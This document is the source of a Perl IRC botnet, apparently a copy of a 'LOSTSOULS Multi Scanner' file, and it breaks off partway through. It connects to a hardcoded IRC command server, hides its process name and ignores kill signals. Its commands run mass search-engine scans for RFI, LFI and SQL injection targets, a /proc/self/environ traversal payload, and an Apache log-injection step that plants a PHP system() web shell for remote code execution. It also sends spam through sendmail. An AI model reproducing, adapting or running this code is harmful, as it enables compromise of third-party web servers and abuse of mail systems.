Page 1

#!/usr/bin/perl use HTTP::Request; use LWP::UserAgent; use IO::Socket; use IO::Select; use Socket; my $procfake = "/bin/sh/root"; my $privserver = 'irc.root-network.org'; my $privport = "6667"; my $nickname = "sql".int(rand(1000)); my $ident = "sql".int(rand(1000)); my $channel = '#vaiqvai'; my $result_channel_cmd = '#vaiqvai2'; my $result_channel = '#vai'; my $runner = "DiAbInHo_InFeRnAL"; my $fullname = 'DiAbInHo_InFeRnAL'; my $loger = "*"; my $injector ='http://binaric.com/img.php.jpg'; my $phpshell = 'http://binaric.com/img.php.jpg'; my $rficmd = 'isouhsouihsui'; my $lficmd = 'lfi'; my $sqlcmd = 'sql'; my $mysqlcmd = '!mysql'; my $mssqlcmd = '!mssql'; my $alicmd = '!log'; my $memail = 'DiAbInHo_InFeRnAL'; my $lficmdsite = 'http://binaric.com/img.php.jpg'; my $lficmdname = 'img.php'; my $lficmdresult = 'irc.shadow-network.net - #infects'; my $thauzinho = 0; $rfi_result = "h4uguen"; $lfi_test = "../../../../../../../../../../../../../../../../proc/self/environ%00"; $lfi_test = "../../../../../../../../../../../../../../../../proc/self/environ"; $lfi_output = "DOCUMENT_ROOT"; $sql_test = "'"; $mysql_output = ("Query failed|Query Error|right syntax to use near"); $mssql_output = ("SQL Server error|Incorrect syntax near|syntax error converting|

unclosed quotation"); my $success = "\n [+] LOSTSOULS Multi Scanner\n [-] Loading Successfully ...\n [-] Process/PID : $procfake - $$\n"; my $failed = "\n [-] perl $0 <host> <port> <nick> <ident> <chan> <admin> <fakeproc> <response> <phpshell>\n\n"; print $success; $SIG{'INT'} = 'IGNORE'; $SIG{'HUP'} = 'IGNORE'; $SIG{'TERM'} = 'IGNORE'; $SIG{'CHLD'} = 'IGNORE'; $SIG{'PS'} = 'IGNORE'; chdir("/"); $privserver="$ARGV[0]" if $ARGV[0]; $0 = "$procfake"."\0"x16;; my $pid = fork; exit if $pid; die "\n [!] Something Wrong !!!: $!" unless defined($pid); our %irc_servers; our %DCC; my $dcc_sel = new IO::Select->new(); $sel_client = IO::Select->new(); sub sendraw { if ($#_ == '1') { my $socket = $_[0]; print $socket "$_[1]\n"; } else { print $IRC_cur_socket "$_[0]\n"; } } sub connector { my $mynick = $_[0]; my $privserver_con = $_[1]; my $privport_con = $_[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$privserver_con", PeerPort=>$privport_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_client->add($IRC_socket);

$irc_servers{$IRC_cur_socket}{'host'} = "$privserver_con"; $irc_servers{$IRC_cur_socket}{'port'} = "$privport_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost; nick("$mynick"); sendraw("USER $ident ".$IRC_socket->sockhost." $privserver_con : $fullname"); sleep 1; } } sub parse { my $servarg = shift; if ($servarg =~ /^PING \:(.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; if ($args =~ /^\001VERSION\001$/) { notice("$pn", "\001VERSION mIRC v6.17 Khaled MardamBey\001"); } if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ ) { my $natrix = $1; my $arg = $2; } } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { if (lc($1) eq lc($mynick)) { $mynick=$4; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; } } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { nick("$mynick|".int rand(999)); } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { $mynick = $2; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; sendraw("MODE $nickname +Bx"); sendraw("JOIN $channel"); sendraw("JOIN $result_channel"); sendraw("JOIN $result_channel_cmd"); sendraw("OPER buceta gostosa"); sendraw("PRIVMSG $channel :sup niggaz! ;*"); } }

my $line_temp; while( $thauzinho != 1 ) { while (!(keys(%irc_servers)) && ($thauzinho != 1)) { connector("$nickname", "$privserver", "$privport"); } delete($irc_servers{''}) if (defined($irc_servers{''})); my @ready = $sel_client->can_read(0); next unless(@ready); foreach $fh (@ready) { $IRC_cur_socket = $fh; $mynick = $irc_servers{$IRC_cur_socket}{'nick'}; $nread = sysread($fh, $msg, 4096); if ($nread == 0) { $sel_client->remove($fh); $fh->close; delete($irc_servers{$fh}); } @lines = split (/\n/, $msg); $msg =~ s/\r\n$//;

##################################################################### ############################[ CMD LIST ] ############################# ##################################################################### if ($msg=~ /PRIVMSG $channel :!help/){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2Help15) 6 $rficmd <bug> <dork> | $lficmd <bug> <dork> "); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2Help15) 6 $mysqlcmd / $mssqlcmd <bug> <dork> "); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2Help15) 6 Apache Log Injection : $alicmd <host> <port> "); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2Help15) 6 !id | !engine | !pid | !version | !about "); } if ($msg=~ /PRIVMSG $channel :!siouhsuios/){ &response(); } if ($msg=~ /PRIVMSG $channel :!siohusiouhsouis/){ sendraw($IRC_cur_socket, "PRIVMSG $channel : 15(3@2Version15)12 EAE CAMBADA DE FILHO DA PUTA! ");

} if ($msg=~ /PRIVMSG $channel :!suiohsouihsoius/){ sendraw($IRC_cur_socket, "PRIVMSG $channel : 15(3@2Engine15)12 Google, Bing, ASK, UOL, LyCos, Yahoo, Biglobe, Seznam."); } if ($msg=~ /PRIVMSG $channel :!pid/){ sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2PID15)12 Process/ID : 12 $procfake - $$"); } if ($msg=~ /PRIVMSG $channel :!thauzinho/){ $thauzinho = 1; } if ($msg=~ /PRIVMSG $channel :$nickname:thauzinho/){ $thauzinho = 1; } if ($msg=~ /PRIVMSG $channel :!about/){ #sendraw($IRC_cur_socket, "PRIVMSG $channel : 15(3@2About15)3 LOSTSOULS Multi Scanner v5.1"); #sendraw($IRC_cur_socket, "PRIVMSG $channel : 15(3@2About15)3 Coded by Vrs-hCk - MainHack BrotherHood "); #sendraw($IRC_cur_socket, "PRIVMSG $channel : 15(3@2About15)3 Copyleft 2009 LOSTSOULS UnderGrounD"); }

##################################################################### ###############################[ RFI ] ############################### #####################################################################

##################################################################### Spammer if ($msg=~ /PRIVMSG $channel :$nickname\s+(.*?)\s+(.*?)\s+(.*?)\s+ (.*)\s+-nome\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0);

} else { if (fork) { exit; } else { my ($list,$eng,$from,$assunto, $nome) = ($1,$2,$3,$4,$5); sendraw($IRC_cur_socket, "PRIVMSG $channel : 12+1SPAM by SendMail Iniciado!!!"); my $scr = getcontent($list); if ($scr !~ m/.*\@.*\..*/) { sendraw($IRC_cur_socket, "PRIVMSG $channel : 12+1Lista Mail Ruim!!!"); exit(0); } my @list = split(/\n/, $scr); $assunto =~ s/\n//g; my $i = 0; my $mailtype = "content-type: text/html"; my $sendmail = '/usr/sbin/sendmail'; my $total = scalar(@list); my $eeng = getcontent($eng); foreach my $email (@list) { $i++; open (SENDMAIL, "| $sendmail -t"); print SENDMAIL "$mailtype\n"; print SENDMAIL "Subject: $assunto\n"; print SENDMAIL "From: $nome <$from>\n"; print SENDMAIL "To: $email\n\n"; print SENDMAIL "$eeng\n\n"; close (SENDMAIL); if (($i % 1000 == 0)||($i == $total)) { my $eeng = getcontent($eng); sendraw($IRC_cur_socket, "PRIVMSG $channel : 1Spam by SendMail:14 Enviados: $i de $total"); } } sendraw($IRC_cur_socket, "PRIVMSG $channel :12+1Status - Spam by SendMail finalizado"); my $assunto = "Teste de Inboxes";

my $from = "Xscholler\@Homossexual.co"; my $eeng = "Oi gatinho, eu sou o $nickname , estou toda inboxizinha. . ."; my $mailtype = "content-type: text/html"; my $sendmail = '/usr/sbin/sendmail'; open (SENDMAIL, "| $sendmail -t"); print SENDMAIL "$mailtype\n"; print SENDMAIL "Subject: $assunto\n"; print SENDMAIL "From: $nome <$from>\n"; print SENDMAIL "To: $memail\n\n"; print SENDMAIL "$eeng\n\n"; close (SENDMAIL); } exit; } }

##################################################################### Google Engine if ($msg=~ /PRIVMSG $channel :!test\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($email) = ($1); sendraw($IRC_cur_socket, "PRIVMSG $channel : 12+1Teste do SendMail Iniciado!!!"); if ($email !~ m/.*\@.*\..*/) { sendraw($IRC_cur_socket, "PRIVMSG $channel : 12+1Digite um email, idiota!!!"); exit(0); } $memail = $email; my $assunto = "Teste de Inboxes"; my $from = "Xscholler\@Homossexual.co"; my $eeng = "Oi gatinho, eu sou o $nickname , estou toda inboxizinha. . ."; my $mailtype = "content-type: text/html"; my $sendmail = '/usr/sbin/sendmail'; open (SENDMAIL, "| $sendmail -t");

print SENDMAIL "$mailtype\n"; print SENDMAIL "Subject: $assunto\n"; print SENDMAIL "From: $from\n"; print SENDMAIL "To: $email\n\n"; print SENDMAIL "$eeng\n\n"; close (SENDMAIL);

sendraw($IRC_cur_socket, "PRIVMSG $channel : 12+1Status - Spam ASP by SendMail finalizado 12-"); } exit; } }

##################################################################### Google Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$rficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "GooGLe"; my $bugx = $1; my $d0rk = $2; sendraw($IRC_cur_socket, "PRIVMSG $channel : 15(3@2RFI15)(3@2LOSTSOULS15)12 Dork :12 $d0rk"); sendraw($IRC_cur_socket, "PRIVMSG $channel : 15(3@2RFI15)(3@2LOSTSOULS15)12 File :12 $bugx"); sendraw($IRC_cur_socket, "PRIVMSG $channel : 15(3@2RFI15)(3@2LOSTSOULS15)3 Search Engine Loading ..."); &rfiscan($engx,$bugx,$d0rk); } exit; } }


AllTheWeb Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$rficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AllTheWeb"; my $bugx = $1; my $d0rk = $2; &rfiscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### Bing Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$rficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "Bing"; my $bugx = $1; my $d0rk = $2; &rfiscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### Altavista Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$rficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "ALtaViSTa";

my $bugx = $1; my $d0rk = $2; &rfiscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### ASK Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$rficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AsK"; my $bugx = $1; my $d0rk = $2; &rfiscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### UoL Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$rficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "UoL"; my $bugx = $1; my $d0rk = $2; &rfiscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### LyCos Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$rficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "LyCos"; my $bugx = $1; my $d0rk = $2; &rfiscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### Yahoo Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$rficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "YahOo"; my $bugx = $1; my $d0rk = $2; &rfiscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### ###############################[ LFI ] ############################### #####################################################################

##################################################################### Google Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "GooGLe"; my $bugx = $1; my $d0rk = $2; sendraw($IRC_cur_socket, "PRIVMSG $channel : 15(3@2LFI15)(3@2LOSTSOULS15)12 Dork :12 $d0rk"); sendraw($IRC_cur_socket, "PRIVMSG $channel : 15(3@2LFI15)(3@2LOSTSOULS15)12 File :12 $bugx"); sendraw($IRC_cur_socket, "PRIVMSG $channel : 15(3@2LFI15)(3@2LOSTSOULS15)3 Search Engine Loading ..."); &lfiscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### AllTheWeb Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AllTheWeb"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### Bing Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "Bing"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### Altavista Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "ALtaViSTa"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### ASK Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else {

if (fork) { exit; } else { my $engx = "AsK"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### UoL Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "UoL"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### LyCos Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "LyCos"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; }


##################################################################### Yahoo Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$lficmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "YahOo"; my $bugx = $1; my $d0rk = $2; &lfiscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### ##########################[ Blind SQL and Normal ] ############################# #####################################################################

##################################################################### Google Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$sqlcmd\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "GooGLe"; my $d0rk = $1; sendraw($IRC_cur_socket, "PRIVMSG $channel : 15(3@2SQL15)(3@2LOSTSOULS15)12 Dork :12 $d0rk");

sendraw($IRC_cur_socket, "PRIVMSG $channel : 15(3@2SQL15)(3@2LOSTSOULS15)3 Search Engine Loading ..."); &sqlscan($engx,$d0rk); } exit; } }

##################################################################### AllTheWeb Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$sqlcmd\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AllTheWeb"; my $d0rk = $1; &sqlscan($engx,$d0rk); } exit; } }

##################################################################### Bing Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$sqlcmd\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "Bing"; my $d0rk = $1; &sqlscan($engx,$d0rk); } exit; } }

##################################################################### Altavista Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$sqlcmd\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "ALtaViSTa"; my $d0rk = $1; &sqlscan($engx,$d0rk); } exit; } }

##################################################################### ASK Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$sqlcmd\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AsK"; my $d0rk = $1; &sqlscan($engx,$d0rk); } exit; } }

##################################################################### UoL Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$sqlcmd\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "UoL"; my $d0rk = $1;

&sqlscan($engx,$d0rk); } exit; } }

##################################################################### LyCos Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$sqlcmd\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "LyCos"; my $d0rk = $1; &sqlscan($engx,$d0rk); } exit; } }

##################################################################### Yahoo Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$sqlcmd\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "YahOo"; my $d0rk = $1; &sqlscan($engx,$d0rk); } exit; } }

##################################################################### Biglobe Engine

if ($msg=~ /PRIVMSG $channel :$nickname\s+$sqlcmd\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "Biglobe"; my $d0rk = $1; &sqlscan($engx,$d0rk); } exit; } }

##################################################################### Seznam Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$sqlcmd\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "Seznam"; my $d0rk = $1; &sqlscan($engx,$d0rk); } exit; } }

##################################################################### Sapo Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$sqlcmd\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "Sapo"; my $d0rk = $1; &sqlscan($engx,$d0rk); }

exit; } }

##################################################################### Hotbot Engine if ($msg=~ /PRIVMSG $channel :$nickname\s+$sqlcmd\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "Hotbot"; my $d0rk = $1; &sqlscan($engx,$d0rk); } exit; } }

##################################################################### ##############################[ MySQL ] ############################## #####################################################################

##################################################################### Google Engine if ($msg=~ /PRIVMSG $channel :$mysqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "GooGLe"; my $bugx = $1; my $d0rk = $2; sendraw($IRC_cur_socket, "PRIVMSG $channel :

15(3@2SQL15)(3@2LOSTSOULS15)12 Dork :12 $d0rk"); sendraw($IRC_cur_socket, "PRIVMSG $channel : 15(3@2SQL15)(3@2LOSTSOULS15)12 File :12 $bugx"); sendraw($IRC_cur_socket, "PRIVMSG $channel : 15(3@2SQL15)(3@2LOSTSOULS15)3 Search Engine Loading ..."); &mysqlscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### AllTheWeb Engine if ($msg=~ /PRIVMSG $channel :$mysqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AllTheWeb"; my $bugx = $1; my $d0rk = $2; &mysqlscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### Bing Engine if ($msg=~ /PRIVMSG $channel :$mysqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "Bing"; my $bugx = $1; my $d0rk = $2; &mysqlscan($engx,$bugx,$d0rk); } exit;

} }

##################################################################### Altavista Engine if ($msg=~ /PRIVMSG $channel :$mysqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "ALtaViSTa"; my $bugx = $1; my $d0rk = $2; &mysqlscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### ASK Engine if ($msg=~ /PRIVMSG $channel :$mysqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AsK"; my $bugx = $1; my $d0rk = $2; &mysqlscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### UoL Engine if ($msg=~ /PRIVMSG $channel :$mysqlcmd\s+(.*?)\s+(.*)/ ) {

if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "UoL"; my $bugx = $1; my $d0rk = $2; &mysqlscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### Lycos Engine if ($msg=~ /PRIVMSG $channel :$mysqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "LyCos"; my $bugx = $1; my $d0rk = $2; &mysqlscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### Yahoo Engine if ($msg=~ /PRIVMSG $channel :$mysqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "YahOo"; my $bugx = $1; my $d0rk = $2;

&mysqlscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### Biglobe Engine if ($msg=~ /PRIVMSG $channel :$mysqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "Biglobe"; my $bugx = $1; my $d0rk = $2; &mysqlscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### Seznam Engine if ($msg=~ /PRIVMSG $channel :$mysqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "Seznam"; my $bugx = $1; my $d0rk = $2; &mysqlscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### Sapo Engine if ($msg=~ /PRIVMSG $channel :$mysqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "Sapo"; my $bugx = $1; my $d0rk = $2; &mysqlscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### Hotbot Engine if ($msg=~ /PRIVMSG $channel :$mysqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "Hotbot"; my $bugx = $1; my $d0rk = $2; &mysqlscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### ##############################[ MSSQL ] ############################## #####################################################################

##################################################################### Google Engine if ($msg=~ /PRIVMSG $channel :$mssqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "GooGLe"; my $bugx = $1; my $d0rk = $2; sendraw($IRC_cur_socket, "PRIVMSG $channel : 15(3@2SQL15)(3@2LOSTSOULS15)12 Dork :12 $d0rk"); sendraw($IRC_cur_socket, "PRIVMSG $channel : 15(3@2SQL15)(3@2LOSTSOULS15)12 File :12 $bugx"); sendraw($IRC_cur_socket, "PRIVMSG $channel : 15(3@2SQL15)(3@2LOSTSOULS15)3 Search Engine Loading ..."); &mssqlscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### AllTheWeb Engine if ($msg=~ /PRIVMSG $channel :$mssqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AllTheWeb"; my $bugx = $1; my $d0rk = $2; &mssqlscan($engx,$bugx,$d0rk); } exit; } }


Bing Engine if ($msg=~ /PRIVMSG $channel :$mssqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "Bing"; my $bugx = $1; my $d0rk = $2; &mssqlscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### Altavista Engine if ($msg=~ /PRIVMSG $channel :$mssqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "ALtaViSTa"; my $bugx = $1; my $d0rk = $2; &mssqlscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### ASK Engine if ($msg=~ /PRIVMSG $channel :$mssqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "AsK";

my $bugx = $1; my $d0rk = $2; &mssqlscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### UoL Engine if ($msg=~ /PRIVMSG $channel :$mssqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "UoL"; my $bugx = $1; my $d0rk = $2; &mssqlscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### Lycos Engine if ($msg=~ /PRIVMSG $channel :$mssqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "LyCos"; my $bugx = $1; my $d0rk = $2; &mssqlscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### Yahoo Engine if ($msg=~ /PRIVMSG $channel :$mssqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "YahOo"; my $bugx = $1; my $d0rk = $2; &mssqlscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### Biglobe Engine if ($msg=~ /PRIVMSG $channel :$mssqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "Biglobe"; my $bugx = $1; my $d0rk = $2; &mssqlscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### Seznam Engine if ($msg=~ /PRIVMSG $channel :$mssqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else { my $engx = "Seznam"; my $bugx = $1; my $d0rk = $2; &mssqlscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### Sapo Engine if ($msg=~ /PRIVMSG $channel :$mssqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "Sapo"; my $bugx = $1; my $d0rk = $2; &mssqlscan($engx,$bugx,$d0rk); } exit; } }

##################################################################### Hotbot Engine if ($msg=~ /PRIVMSG $channel :$mssqlcmd\s+(.*?)\s+(.*)/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $engx = "Hotbot"; my $bugx = $1; my $d0rk = $2; &mssqlscan($engx,$bugx,$d0rk); } exit;

} }

##################################################################### ##################################################################### Apache Log Injection if ($msg=~ /PRIVMSG $channel :$alicmd\s+(.*?)\s+(.+[0-9])/ ) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &injectlog($1,$2); } exit; } } for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line=$line_temp.$line if ($line_temp); $line_temp=''; $line =~ s/\r$//; unless ($c == $#lines) { parse("$line"); } else { if ($#lines == 0) { parse("$line"); } elsif ($lines[$c] =~ /\r$/) { parse("$line"); } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { parse("$line"); } else { $line_temp = $line; } } } } } ##################################################################### Procedure

sub injectlog() { my $host = $_[0]; my $port = $_[1]; sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2ALI15)12 Injecting3 ". $host.":".$port." 12Apache Access Log ..."); my $php = "<?php if(get_magic_quotes_gpc()){ \$_GET[c0li]=stripslashes(\ $_GET[c0li]);} system(\$_GET[c0li]);?>"; $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 80, Proto => "tcp") || die sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2ALI15)12 Cant Connect to3 ".$host.":".$port.""); print $sock "GET /LOSTSOULS.UnderGrounD ".$php." HTTP/1.1\r\n"; print $sock "Host: ".$host."\r\n"; print $sock "Connection: close\r\n\r\n"; close($sock); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2ALI15)3 ".$host." 12is Done ..."); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2ALI15)3 ".$host." 12RCE Parameter ->3 c0li"); sendraw($IRC_cur_socket, "PRIVMSG $channel :15(3@2ALI15)3 ".$host." 12RCE Identifier ->3 LOSTSOULS.UnderGrounD"); } sub rfiscan() { my $engz = $_[0]; my $bugz = $_[1]; my $dork = $_[2]; my $bsqlon = 0; my $contatore = 0; if ($engz =~ /GooGLe/) { my @google=&google($dork, $bsqlon); push(@total, @google); } if ($engz =~ /AllTheWeb/) { my @alltheweb=&alltheweb($dork, $bsqlon); push(@total, @alltheweb); } if ($engz =~ 